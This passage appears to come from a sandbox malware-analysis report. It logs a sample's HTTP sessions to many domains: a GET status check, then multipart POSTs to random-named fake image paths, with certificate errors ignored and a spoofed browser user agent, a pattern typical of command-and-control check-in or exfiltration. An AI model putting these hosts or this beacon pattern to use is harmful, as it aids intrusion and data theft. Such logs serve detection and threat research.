Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = static/imgs/thseda.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.poketeg.com/static/imgs/thseda.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #7
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name perovaphoto.ru
Server Port 80
Data Sent 232
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = perovaphoto.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = perovaphoto.ru/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #8
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name perovaphoto.ru
Server Port 80
Data Sent 253
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = perovaphoto.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = data/pics/fudada.bmp, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = perovaphoto.ru/data/pics/fudada.bmp True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #9
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name asl-company.ru
Server Port 80
Data Sent 232
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = asl-company.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = asl-company.ru/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #10
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name asl-company.ru
Server Port 80
Data Sent 256
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = asl-company.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = content/assets/hehe.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = asl-company.ru/content/assets/hehe.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #11
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.fabbfoundation.gm
Server Port 80
Data Sent 246
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.fabbfoundation.gm, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.fabbfoundation.gm/ False 1
Fn
HTTP Session #12
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.fabbfoundation.gm
Server Port 80
Data Sent 275
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.fabbfoundation.gm, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/images/dameke.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.fabbfoundation.gm/wp-content/images/dameke.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #13
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.perfectfunnelblueprint.com
Server Port 80
Data Sent 264
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.perfectfunnelblueprint.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.perfectfunnelblueprint.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #14
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.perfectfunnelblueprint.com
Server Port 80
Data Sent 290
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.perfectfunnelblueprint.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = static/image/medethke.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.perfectfunnelblueprint.com/static/image/medethke.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #15
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.wash-wear.com
Server Port 80
Data Sent 238
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.wash-wear.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = www.wash-wear.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #16
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name www.wash-wear.com
Server Port 80
Data Sent 266
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = www.wash-wear.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = content/imgs/seruhemede.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = www.wash-wear.com/content/imgs/seruhemede.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #17
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name pp-panda74.ru
Server Port 80
Data Sent 230
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = pp-panda74.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = pp-panda74.ru/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #18
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name pp-panda74.ru
Server Port 80
Data Sent 253
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = pp-panda74.ru, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = data/assets/dameth.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = pp-panda74.ru/data/assets/dameth.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #19
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name cevent.net
Server Port 80
Data Sent 224
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = cevent.net, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cevent.net/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #20
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name cevent.net
Server Port 80
Data Sent 255
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = cevent.net, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/images/hekadaso.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = cevent.net/wp-content/images/hekadaso.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #21
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name bellytobabyphotographyseattle.com
Server Port 80
Data Sent 270
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = bellytobabyphotographyseattle.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = bellytobabyphotographyseattle.com/ False 1
Fn
HTTP Session #22
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name bellytobabyphotographyseattle.com
Server Port 80
Data Sent 300
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = bellytobabyphotographyseattle.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = uploads/images/moruesdese.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = bellytobabyphotographyseattle.com/uploads/images/moruesdese.gif False 1
Fn
Close Session - True 58
Fn
HTTP Session #23
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name alem.be
Server Port 80
Data Sent 218
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = alem.be, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = alem.be/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #24
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name alem.be
Server Port 80
Data Sent 243
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = alem.be, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = static/imgs/somosoth.png, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = alem.be/static/imgs/somosoth.png True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #25
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name boatshowradio.com
Server Port 80
Data Sent 238
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = boatshowradio.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = boatshowradio.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #26
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name boatshowradio.com
Server Port 443
Data Sent 272
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = boatshowradio.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = content/pictures/mokekaimzuim.jpg, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = boatshowradio.com/content/pictures/mokekaimzuim.jpg True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #27
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name dna-cp.com
Server Port 80
Data Sent 224
Data Received 3
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = dna-cp.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_AUTO_REDIRECT, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = dna-cp.com/ True 1
Fn
Query HTTP Info flags = HTTP_QUERY_STATUS_CODE, size_out = 3 True 1
Fn
Data
HTTP Session #28
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name dna-cp.com
Server Port 443
Data Sent 250
Data Received 0
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = dna-cp.com, server_port = 443 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = wp-content/tmp/dahehe.gif, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = Content-Type: multipart/form-data, url = dna-cp.com/wp-content/tmp/dahehe.gif True 1
Fn
Data
Close Session - True 58
Fn
HTTP Session #29
Information Value
User Agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Server Name acbt.fr
Server Port 80
Data Sent 218
Data Received 3
Operation Additional Information Success Count Logfile
